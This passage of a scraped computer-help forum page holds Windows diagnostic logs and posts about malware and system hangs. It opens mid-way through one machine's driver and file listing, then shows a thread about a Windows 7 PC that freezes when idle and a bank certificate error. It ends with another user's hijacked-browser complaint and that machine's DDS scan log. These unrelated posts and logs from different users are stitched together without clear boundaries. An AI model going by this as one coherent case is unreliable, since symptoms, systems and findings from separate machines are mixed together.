S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2015-7-10 122608]
S3 iaStorAV;Intel(R) SATA RAID Controller Windows;C:\WINDOWS\System32\drivers\iaStorAV.sys [2015-7-10 673120]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2015-7-10 424800]
S3 IntcDAud;Intel(R) Display Audio;C:\WINDOWS\System32\drivers\IntcDAud.sys [2013-3-27 442368]
S3 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2015-7-10 43872]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2015-7-10 104800]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2015-7-10 99168]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2015-7-10 705376]
S3 ndfltr;NetworkDirect Service;C:\WINDOWS\System32\drivers\ndfltr.sys [2015-7-10 76128]
S3 netvsc;netvsc;C:\WINDOWS\System32\drivers\netvsc.sys [2015-7-10 94720]
S3 percsas2i;percsas2i;C:\WINDOWS\System32\drivers\percsas2i.sys [2015-7-10 58208]
S3 percsas3i;percsas3i;C:\WINDOWS\System32\drivers\percsas3i.sys [2015-7-10 58720]
S3 ReFSv1;ReFSv1;C:\WINDOWS\System32\drivers\refsv1.sys [2015-8-2 934752]
S3 RSPCIESTOR;Realtek PCIE CardReader Driver;C:\WINDOWS\System32\drivers\RtsPStor.sys [2015-6-3 374016]
S3 rzendpt;rzendpt;C:\WINDOWS\System32\drivers\rzendpt.sys [2014-12-30 39592]
S3 rzudd;Razer Mouse Driver;C:\WINDOWS\System32\drivers\rzudd.sys [2014-12-30 177832]
S3 SerCx2;Serial UART Support Library;C:\WINDOWS\System32\drivers\SerCx2.sys [2015-7-10 155488]
S3 stornvme;Microsoft Standard NVM Express Driver;C:\WINDOWS\System32\drivers\stornvme.sys [2015-8-20 80720]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;C:\WINDOWS\System32\drivers\storufs.sys [2015-7-10 40288]
S3 UcmCx0101;USB Connector Manager KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmCx.sys [2015-7-10 61952]
S3 UcmUcsi;USB Connector Manager UCSI Client;C:\WINDOWS\System32\drivers\UcmUcsi.sys [2015-8-2 46080]
S3 UdeCx;USB Device Emulation Support Library;C:\WINDOWS\System32\drivers\Udecx.sys [2015-7-10 44032]
S3 UEFI;Microsoft UEFI Driver;C:\WINDOWS\System32\drivers\uefi.sys [2015-7-10 28512]
S3 Ufx01000;USB Function Class Extension;C:\WINDOWS\System32\drivers\ufx01000.sys [2015-7-10 245088]
S3 UfxChipidea;USB Chipidea Controller;C:\WINDOWS\System32\drivers\UfxChipidea.sys [2015-7-10 94048]
S3 ufxsynopsys;USB Synopsys Controller;C:\WINDOWS\System32\drivers\ufxsynopsys.sys [2015-7-10 127840]
S3 UrsChipidea;Chipidea USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urschipidea.sys [2015-7-10 28512]
S3 UrsCx01000;USB Role-Switch Support Library;C:\WINDOWS\System32\drivers\urscx01000.sys [2015-7-10 57696]
S3 UrsSynopsys;Synopsys USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urssynopsys.sys [2015-7-10 27488]
S3 vhf;Virtual HID Framework (VHF) Driver;C:\WINDOWS\System32\drivers\vhf.sys [2015-7-10 31744]
S3 wdiwifi;WDI Driver Framework;C:\WINDOWS\System32\drivers\WdiWiFi.sys [2015-8-20 685568]
S3 WdNisDrv;Windows Defender Network Inspection System Driver;C:\WINDOWS\System32\drivers\WdNisDrv.sys [2015-7-10 119648]
S3 WinMad;WinMad Service;C:\WINDOWS\System32\drivers\winmad.sys [2015-7-10 26976]
S3 WinVerbs;WinVerbs Service;C:\WINDOWS\System32\drivers\winverbs.sys [2015-7-10 59232]
S3 xboxgip;Xbox Game Input Protocol Driver;C:\WINDOWS\System32\drivers\xboxgip.sys [2015-7-10 222720]
S3 xinputhid;XINPUT HID Filter Driver;C:\WINDOWS\System32\drivers\xinputhid.sys [2015-7-10 25600]
SUnknown IoQos;IoQos; [x]
.
=============== File Associations ===============
.
FileExt: .js: Applications\Notepad.exe=C:\WINDOWS\System32\NOTEPAD.EXE %1 [UserChoice]
ShellExec: dreamweaver.exe: Open="C:\Program Files\Adobe\Adobe Dreamweaver CC 2014.1\dreamweaver.exe", "%1"
ShellExec: opera.exe: open="C:\Program Files (x86)\Opera\Launcher.exe" "%1"
.
=============== Created Last 30 ================
.
2015-09-23 12:51:48 16148 ----a-w- C:\WINDOWS\System32\PHILIPPEC-LAP_philippe_HistoryPrediction.bin
2015-09-19 18:00:33 -------- d-----w- C:\NPE
2015-09-19 15:58:35 113880 ----a-w- C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys
2015-09-19 15:58:14 64216 ----a-w- C:\WINDOWS\System32\drivers\mwac.sys
2015-09-19 15:58:14 25816 ----a-w- C:\WINDOWS\System32\drivers\mbam.sys
2015-09-19 15:58:14 109272 ----a-w- C:\WINDOWS\System32\drivers\mbamchameleon.sys
2015-09-19 15:58:13 -------- d-----w- C:\ProgramData\Malwarebytes
2015-09-19 15:58:13 -------- d-----w- C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-09-18 15:10:46 -------- d-----w- C:\Users\philippe\AppData\Local\FluxSoftware
2015-09-18 14:20:13 -------- d-----r- C:\Users\philippe\Creative Cloud Files
2015-09-18 13:40:57 609592 ----a-w- C:\WINDOWS\System32\ci.dll
.
==================== Find3M ====================
.
2015-09-23 12:51:47 180 ----a-w- C:\WINDOWS\System32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2015-08-13 04:23:47 2178560 ----a-w- C:\WINDOWS\System32\AppXDeploymentServer.dll
2015-08-13 04:22:26 2093056 ----a-w- C:\WINDOWS\System32\wlidsvc.dll
2015-08-13 04:20:39 414208 ----a-w- C:\WINDOWS\System32\AppXDeploymentClient.dll
2015-08-13 04:17:58 1795072 ----a-w- C:\WINDOWS\System32\AppXDeploymentExtensions.dll
2015-08-13 03:53:21 311808 ----a-w- C:\WINDOWS\SysWow64\AppXDeploymentClient.dll
2015-08-11 10:04:24 2462648 ----a-w- C:\WINDOWS\System32\mfcore.dll
2015-08-11 10:04:23 4532304 ----a-w- C:\WINDOWS\explorer.exe
2015-08-11 10:04:15 1087296 ----a-w- C:\WINDOWS\System32\mfplat.dll
2015-08-11 10:03:20 8021840 ----a-w- C:\WINDOWS\System32\ntoskrnl.exe
2015-08-11 10:03:09 442208 ----a-w- C:\WINDOWS\System32\drivers\storport.sys
2015-08-11 10:02:57 554744 ----a-w- C:\WINDOWS\System32\directmanipulation.dll
2015-08-11 10:02:56 80720 ----a-w- C:\WINDOWS\System32\drivers\stornvme.sys
2015-08-11 10:02:49 292856 ----a-w- C:\WINDOWS\System32\LockAppHost.exe
2015-08-11 09:52:49 993104 ----a-w- C:\WINDOWS\System32\ReAgent.dll
2015-08-11 09:50:47 1643872 ----a-w- C:\WINDOWS\System32\diagtrack.dll
2015-08-11 09:40:22 4048808 ----a-w- C:\WINDOWS\SysWow64\explorer.exe
2015-08-11 09:40:12 918320 ----a-w- C:\WINDOWS\SysWow64\mfplat.dll
2015-08-11 09:40:08 2151208 ----a-w- C:\WINDOWS\SysWow64\mfcore.dll
2015-08-11 09:38:22 454000 ----a-w- C:\WINDOWS\SysWow64\directmanipulation.dll
2015-08-11 09:37:48 243800 ----a-w- C:\WINDOWS\SysWow64\LockAppHost.exe
2015-08-11 09:26:03 845664 ----a-w- C:\WINDOWS\SysWow64\ReAgent.dll
2015-08-11 09:23:59 16706560 ----a-w- C:\WINDOWS\System32\Windows.UI.Xaml.dll
2015-08-11 09:22:04 21875200 ----a-w- C:\WINDOWS\System32\edgehtml.dll
2015-08-11 09:21:13 148992 ----a-w- C:\WINDOWS\System32\tetheringservice.dll
2015-08-11 09:21:04 52224 ----a-w- C:\WINDOWS\System32\tetheringclient.dll
2015-08-11 09:20:42 2224640 ----a-w- C:\WINDOWS\System32\NetworkMobileSettings.dll
2015-08-11 09:20:02 483328 ----a-w- C:\WINDOWS\System32\OneDriveSettingSyncProvider.dll
2015-08-11 09:19:45 235520 ----a-w- C:\WINDOWS\System32\SettingsHandlers_Notifications.dll
2015-08-11 09:18:44 235008 ----a-w- C:\WINDOWS\System32\UserMgrProxy.dll
2015-08-11 09:16:32 2416640 ----a-w- C:\WINDOWS\System32\MFMediaEngine.dll
2015-08-11 09:14:02 404480 ----a-w- C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-08-11 09:13:42 413184 ----a-w- C:\WINDOWS\System32\diagtrack_win.dll
2015-08-11 09:11:40 2446336 ----a-w- C:\WINDOWS\System32\InputService.dll
2015-08-11 09:11:18 553472 ----a-w- C:\WINDOWS\System32\GamePanel.exe
2015-08-11 09:10:47 293376 ----a-w- C:\WINDOWS\System32\TextInputFramework.dll
2015-08-11 09:10:12 324096 ----a-w- C:\WINDOWS\System32\Windows.ApplicationModel.Store.TestingFramework.dll
2015-08-11 09:10:06 778752 ----a-w- C:\WINDOWS\System32\Windows.ApplicationModel.Store.dll
2015-08-11 09:09:55 32768 ----a-w- C:\WINDOWS\System32\wuautoappupdate.dll
2015-08-11 09:08:04 893440 ----a-w- C:\WINDOWS\System32\MbaeApiPublic.dll
2015-08-11 09:08:04 563200 ----a-w- C:\WINDOWS\System32\MbaeApi.dll
2015-08-11 09:07:52 593920 ----a-w- C:\WINDOWS\System32\wcmsvc.dll
2015-08-11 09:07:47 1178112 ----a-w- C:\WINDOWS\System32\wwansvc.dll
2015-08-11 09:07:44 115712 ----a-w- C:\WINDOWS\System32\MbaeParserTask.exe
2015-08-11 09:06:50 2662400 ----a-w- C:\WINDOWS\System32\Windows.UI.Logon.dll
2015-08-11 09:06:19 7523328 ----a-w- C:\WINDOWS\System32\Chakra.dll
2015-08-11 09:05:48 342016 ----a-w- C:\WINDOWS\System32\LocationGeofences.dll
2015-08-11 09:05:27 269312 ----a-w- C:\WINDOWS\System32\LocationFramework.dll
2015-08-11 09:05:23 78848 ----a-w- C:\WINDOWS\System32\LocationFrameworkInternalPS.dll
2015-08-11 09:05:20 137216 ----a-w- C:\WINDOWS\System32\LocationPermissions.dll
2015-08-11 09:05:10 996352 ----a-w- C:\WINDOWS\System32\RDXService.dll
2015-08-11 09:05:07 3527168 ----a-w- C:\WINDOWS\System32\tquery.dll
2015-08-11 09:03:09 2558976 ----a-w- C:\WINDOWS\System32\mssrch.dll
2015-08-11 09:02:53 186368 ----a-w- C:\WINDOWS\System32\cloudAP.dll
2015-08-11 09:02:15 621056 ----a-w- C:\WINDOWS\System32\enterprisecsps.dll
2015-08-11 09:02:08 3588096 ----a-w- C:\WINDOWS\System32\win32kfull.sys
2015-08-11 09:02:03 1890304 ----a-w- C:\WINDOWS\System32\dwmcore.dll
2015-08-11 09:01:38 1334784 ----a-w- C:\WINDOWS\System32\UIAutomationCore.dll
2015-08-11 09:00:45 336384 ----a-w- C:\WINDOWS\System32\SearchProtocolHost.exe
2015-08-11 09:00:06 274432 ----a-w- C:\WINDOWS\System32\syncutil.dll
2015-08-11 08:59:51 123392 ----a-w- C:\WINDOWS\System32\mssprxy.dll
2015-08-11 08:59:33 42496 ----a-w- C:\WINDOWS\SysWow64\tetheringclient.dll
2015-08-11 08:59:29 1106432 ----a-w- C:\WINDOWS\System32\sysmain.dll
2015-08-11 08:59:27 642560 ----a-w- C:\WINDOWS\System32\rdbui.dll
2015-08-11 08:58:11 372224 ----a-w- C:\WINDOWS\SysWow64\OneDriveSettingSyncProvider.dll
2015-08-11 08:57:51 13024768 ----a-w- C:\WINDOWS\SysWow64\Windows.UI.Xaml.dll
2015-08-11 08:57:12 159744 ----a-w- C:\WINDOWS\SysWow64\UserMgrProxy.dll
2015-08-11 08:51:35 1916928 ----a-w- C:\WINDOWS\SysWow64\MFMediaEngine.dll
2015-08-11 08:51:33 1823232 ----a-w- C:\WINDOWS\SysWow64\InputService.dll
2015-08-11 08:50:59 131584 ----a-w- C:\WINDOWS\SysWow64\Windows.UI.Core.TextInput.dll
2015-08-11 08:50:58 200704 ----a-w- C:\WINDOWS\SysWow64\TextInputFramework.dll
2015-08-11 08:50:47 420352 ----a-w- C:\WINDOWS\SysWow64\GamePanel.exe
2015-08-11 08:49:50 586752 ----a-w- C:\WINDOWS\SysWow64\Windows.ApplicationModel.Store.dll
2015-08-11 08:49:30 247808 ----a-w- C:\WINDOWS\SysWow64\Windows.ApplicationModel.Store.TestingFramework.dll
2015-08-11 08:48:25 671232 ----a-w- C:\WINDOWS\SysWow64\MbaeApiPublic.dll
2015-08-11 08:47:09 448512 ----a-w- C:\WINDOWS\SysWow64\MbaeApi.dll
2015-08-11 08:45:48 18805760 ----a-w- C:\WINDOWS\SysWow64\edgehtml.dll
2015-08-11 08:45:09 1820672 ----a-w- C:\WINDOWS\SysWow64\Windows.UI.Logon.dll
2015-08-11 08:43:39 2748416 ----a-w- C:\WINDOWS\SysWow64\tquery.dll
2015-08-11 08:42:33 5454848 ----a-w- C:\WINDOWS\SysWow64\Chakra.dll
2015-08-11 08:40:45 1593856 ----a-w- C:\WINDOWS\SysWow64\dwmcore.dll
2015-08-11 08:40:32 1964544 ----a-w- C:\WINDOWS\SysWow64\mssrch.dll
2015-08-11 08:40:12 1112064 ----a-w- C:\WINDOWS\SysWow64\UIAutomationCore.dll
2015-08-11 08:39:28 280576 ----a-w- C:\WINDOWS\SysWow64\SearchProtocolHost.exe
2015-08-11 08:38:43 162304 ----a-w- C:\WINDOWS\SysWow64\ReInfo.dll
2015-08-08 15:38:46 794088 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
2015-08-08 15:38:46 179688 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
2015-08-08 07:29:58 1822280 ----a-w- C:\WINDOWS\System32\ntdll.dll
2015-08-08 07:19:45 608936 ----a-w- C:\WINDOWS\System32\fontdrvhost.exe
2015-08-08 07:01:18 1533496 ----a-w- C:\WINDOWS\SysWow64\ntdll.dll
2015-08-08 06:48:13 539728 ----a-w- C:\WINDOWS\SysWow64\fontdrvhost.exe
2015-08-08 06:40:23 365056 ----a-w- C:\WINDOWS\System32\atmfd.dll
2015-08-08 06:24:15 2415104 ----a-w- C:\WINDOWS\System32\DWrite.dll
2015-08-08 06:24:06 1679360 ----a-w- C:\WINDOWS\System32\FntCache.dll
2015-08-08 06:15:14 303104 ----a-w- C:\WINDOWS\SysWow64\atmfd.dll
2015-08-08 06:00:44 1985024 ----a-w- C:\WINDOWS\SysWow64\DWrite.dll
2015-08-06 03:17:40 200528 ----a-w- C:\WINDOWS\System32\drivers\wof.sys
2015-08-06 03:17:34 237392 ----a-w- C:\WINDOWS\System32\drivers\rdyboost.sys
2015-08-06 02:22:03 685568 ----a-w- C:\WINDOWS\System32\drivers\WdiWiFi.sys
2015-08-05 04:49:51 783112 ----a-w- C:\WINDOWS\System32\mfsvr.dll
.
============= FINISH: 14:59:26.77 ===============

Attached Files

attach.txt (25.7 KB)

Here is a post (mine) from the Microsoft 7 forum:

A hangup problem has developed on my Gateway Media Center (Win 7) machine. It has odd characteristics.The computer boots fine, and will run any program I choose, for as long as I choose. But if I let the machine sit for 10 minutes. It locks up. The mouse continues to work but no programs will boot, including shutdown.

If I boot into Safe mode, the computer works fine, for as long as I want to use it. IOW, it does NOT hang. Makes me think it might be a driver problem, altho, contrary to popular belief, Safe mode does load a lot of drivers.

I ran ESET on it several times. First time it found 96 infected files, which it deleted. Second time, it found nothing.

My gut feeling is, it's not a virus, but rather, a driver gone bad. I'm not smart enough to figure it out for sure, which is why I'm here. Appreciate your help.

Wes
WesNathan is online now Report Post Reply With Quote Multi-Quote This Message Quick reply to this message
Old Yesterday, 12:23 PM #2
joeten
Microsoft-Team Manager
Hardware - Team Manager

joeten's Avatar

Join Date: Dec 2008
Location: Glasgow Scotland
Posts: 61,706
OS: win 7 pro/ultimate/xp vm



Re: EMET, and hangups
Hi have you tried a clean boot to troubleshoot https://support.microsoft.com/en-gb/...?wa=wsignin1.0 Please read it fully first.
__________________









Eliminate all other factors, and the one which remains must be the truth.
joeten is offline Report Post Reply With Quote Multi-Quote This Message Quick reply to this message
Old Yesterday, 07:27 PM #3
Masterchiefxx17
Microsoft MVP
Team Manager
- Articles Team
Moderator
- Hardware Team
- Microsoft Support

Masterchiefxx17's Avatar

Microsoft Most Valuable Professional

Join Date: Feb 2010
Location: Wisconsin, USA
Posts: 33,459
OS: Windows 7 64bit Professional (SP1), Windows 8.1 64bit

My System


Re: EMET, and hangups
Quote:
Originally Posted by WesNathan View Post
Two questions:


Quote:
2. A hangup problem has developed on my Gateway Media Center (Win 7) machine. It has odd characteristics.The computer boots fine, and will run any program I choose, for as long as I choose. But if I let the machine sit for 10 minutes. It locks up. The mouse continues to work but no programs will boot, including shutdown.

If I boot into Safe mode, the computer works fine, for as long as I want to use it. IOW, it does NOT hang. Makes me think it might be a driver problem, altho, contrary to popular belief, Safe mode does load a lot of drivers.

I ran ESET on it several times. First time it found 96 infected files, which it deleted. Second time, it found nothing.

My gut feeling is, it's not a virus, but rather, a driver gone bad. I'm not smart enough to figure it out for sure, which is why I'm here. Appreciate your help.

Wes
It could be that your PC still has infected files. I recommend speaking with our malware team.


There is another symptom that worries me. When I try to access one of my bank's online banking site, it get this message:

This Connection is Untrusted

You have asked Firefox to connect securely to onlinebanking.suntrust.com, but we can't confirm that your connection is secure.

Normally, when you try to connect securely, sites will present trusted identification to prove that you are going to the right place. However, this site's identity can't be verified.
What Should I Do?

If you usually connect to this site without problems, this error could mean that someone is trying to impersonate the site, and you shouldn't continue.

This site uses HTTP Strict Transport Security (HSTS) to specify that Firefox only connect to it securely. As a result, it is not possible to add an exception for this certificate.

onlinebanking.suntrust.com uses an invalid security certificate.

The certificate is not trusted because the issuer certificate is unknown.
The server might not be sending the appropriate intermediate certificates.
An additional root certificate may need to be imported.

(Error code: sec_error_unknown_issuer)


I've been using this site and the same logon info for many years, with never a problem. I can log into my other bank site without a problem.

I've been online today for several hours. The computer is running normally, with the exception of the bank login problem. I know, from recent experience, if I walk away for 10 minutes, the machine will lock up, requiring a reboot.

????
__________________

Hi,

My family's computer is a mess. Nothing on Chrome and IE will load, Firefox loads one page then there is a ton of pop ups and won't load anymore. It's sluggish. I've uninstalled programs that were obvious malware like Fast Clean Pro and ran the antivirus they had installed, as well as spybot search and destroy but it didn't make a difference. The Security Center won't turn on, and a lot of security updates failed to install. Please help! Thank you!


-----------------------------


DDS (Ver_2012-11-20.01) - NTFS_AMD64 NETWORK
Internet Explorer: 11.0.9600.17937 BrowserJavaVersion: 10.67.2
Run by Home at 20:56:59 on 2015-09-08
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.4061.3029 [GMT -4:00]
.
AV: Panda Free Antivirus *Enabled/Updated* {AAF74A68-8713-CDF1-004F-30003398BE9E}
SP: Panda Free Antivirus *Enabled/Updated* {1196AB8C-A129-C27F-3AFF-0B72481FF423}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Spybot - Search and Destroy *Enabled/Updated* {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
FW: Panda Firewall *Disabled* {92CCCB4D-CD7C-CCA9-2B10-9935CD4BF9E5}
.
============== Running Processes ===============
.
C:\windows\system32\lsm.exe
C:\windows\system32\svchost.exe -k DcomLaunch
C:\windows\system32\svchost.exe -k RPCSS
C:\windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\windows\system32\svchost.exe -k netsvcs
C:\windows\system32\svchost.exe -k LocalService
C:\windows\system32\svchost.exe -k NetworkService
C:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\PSUAService.exe
C:\windows\System32\svchost.exe -k secsvcs
C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\PSANHost.exe
C:\windows\Explorer.EXE
C:\windows\system32\ctfmon.exe
C:\windows\system32\wbem\wmiprvse.exe
C:\windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uProxyOverride = <local>;
mWinlogon: Userinit = C:\windows\SysWOW64\userinit.exe,
BHO: Adobe PDF Link Helper: {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Skype Click to Call for Internet Explorer: {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
uRunOnce: [BeginInteractiveOSUpgrade] C:\windows\System32\wuauclt.exe /BeginInteractiveOSUpgrade
mRun: [LenovoFSC] C:\Program Files (x86)\Lenovo\FanSpeedControl\LenovoFSC.exe
mRun: [jmekey] C:\Program Files (x86)\jmesoft\hotkey.exe
mRun: [UpdatePRCShortCut] "C:\Program Files\Lenovo\OneKey App\Lenovo Rescue System\MUITransfer\MUIStartMenu.exe" "C:\Program Files\Lenovo\OneKey App\Lenovo Rescue System" UpdateWithCreateOnce "Software\Lenovo\OneKey App\OneKey Recovery"
mRun: [Adobe Reader Speed Launcher] "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [fst_us_112] <no file>
dRunOnce: [panda4_2dn] reg.exe delete "HKCU\Software\AppDataLow\Software\panda4_2dn" /f
dRunOnce: [panda] reg.exe delete "HKCU\Software\AppDataLow\Software\panda" /f
dRunOnce: [panda_XP] reg.exe delete "HKCU\Software\panda" /f
StartupFolder: C:\Users\Home\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ADOBEG~1.LNK - C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: EnableLUA = dword:0
mPolicies-System: MaxGPOScriptWait = dword:600
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MIF5BA~1\Office12\EXCEL.EXE/3000
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office12\ONBttnIE.dll
IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
.
INFO: HKCU has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
.
INFO: HKLM has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
TCP: NameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{05DDD59F-AFE1-4586-8FE2-20968752EA9F} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{20BD1366-DEB5-4A27-B5AA-29BA5B0684E0} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{60688BEE-3ED1-4DCC-88E5-05A8ABB6F224} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{8403AF2E-3BD8-49AB-9BAD-500FE5364A42} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{91E213B4-7FED-452F-AA6A-B48EDF65B269} : DHCPNameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{91E213B4-7FED-452F-AA6A-B48EDF65B269}\25B445A5B4 : DHCPNameServer = 192.168.1.1
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.85\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-mStart Page = hxxp://speedial.com/?f=1&a=spd_cmi_14_25_ch&cd=2XzuyEtN2Y1L1QzuyEyEtAyB0EyCtDzy0BtByCyE0EyC0E0CtN0D0Tzu0SzytDtAtN1L2XzutBtFtBtCtFyBtFtCtN1L1CzutCyEtBzytDyD1V1RtN1L1G1B1V1N2Y1L1Qzu2StB0AzyzztDyDzy0AtGyBzyyCyBtG0F0F0CyBtG0EyBzy0EtGtDyBtA0C0C0B0BzzyEyCtDyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCtA0AzztDzzyEyDtG0FtCyByBtG0Dzz0A0BtGzzzy0C0BtGtCtBtBzytA0FtAtAyBtBtDzy2Q&cr=504169009&ir=
x64-mSearch Page = about:blank
x64-mDefault_Page_URL = about:blank
x64-mDefault_Search_URL = about:blank
x64-mWinlogon: Userinit = C:\windows\SysWOW64\userinit.exe,
x64-BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Skype Click to Call for Internet Explorer: {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll
x64-Run: [IgfxTray] C:\windows\System32\igfxtray.exe
x64-Run: [HotKeysCmds] C:\windows\System32\hkcmd.exe
x64-Run: [Persistence] C:\windows\System32\igfxpers.exe
x64-Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
.
INFO: x64-HKLM has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
x64-Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - <orphaned>
Hosts: 127.0.0.1 Spyware Info | Spyware Info
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Home\AppData\Roaming\Mozilla\Firefox\Profiles\qfe06vtf.default\
FF - prefs.js: browser.search.defaulturl -
FF - prefs.js: browser.search.selectedEngine - Vosteran
FF - prefs.js: browser.startup.homepage - hxxps://www.google.com/
FF - plugin: C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.0.5\npsitesafety.dll
FF - plugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\windows\SysWOW64\Adobe\Director\np32dsw.dll
FF - plugin: C:\windows\SysWOW64\Adobe\Director\np32dsw_1165635.dll
FF - plugin: C:\windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll
.
---- FIREFOX POLICIES ----
.
FF - user.js: extensions.nspdlsd.aflt - spd_cmi_14_25_ch
FF - user.js: extensions.nspdlsd.instlRef - 142905_c
FF - user.js: extensions.nspdlsd.cr - 504169009
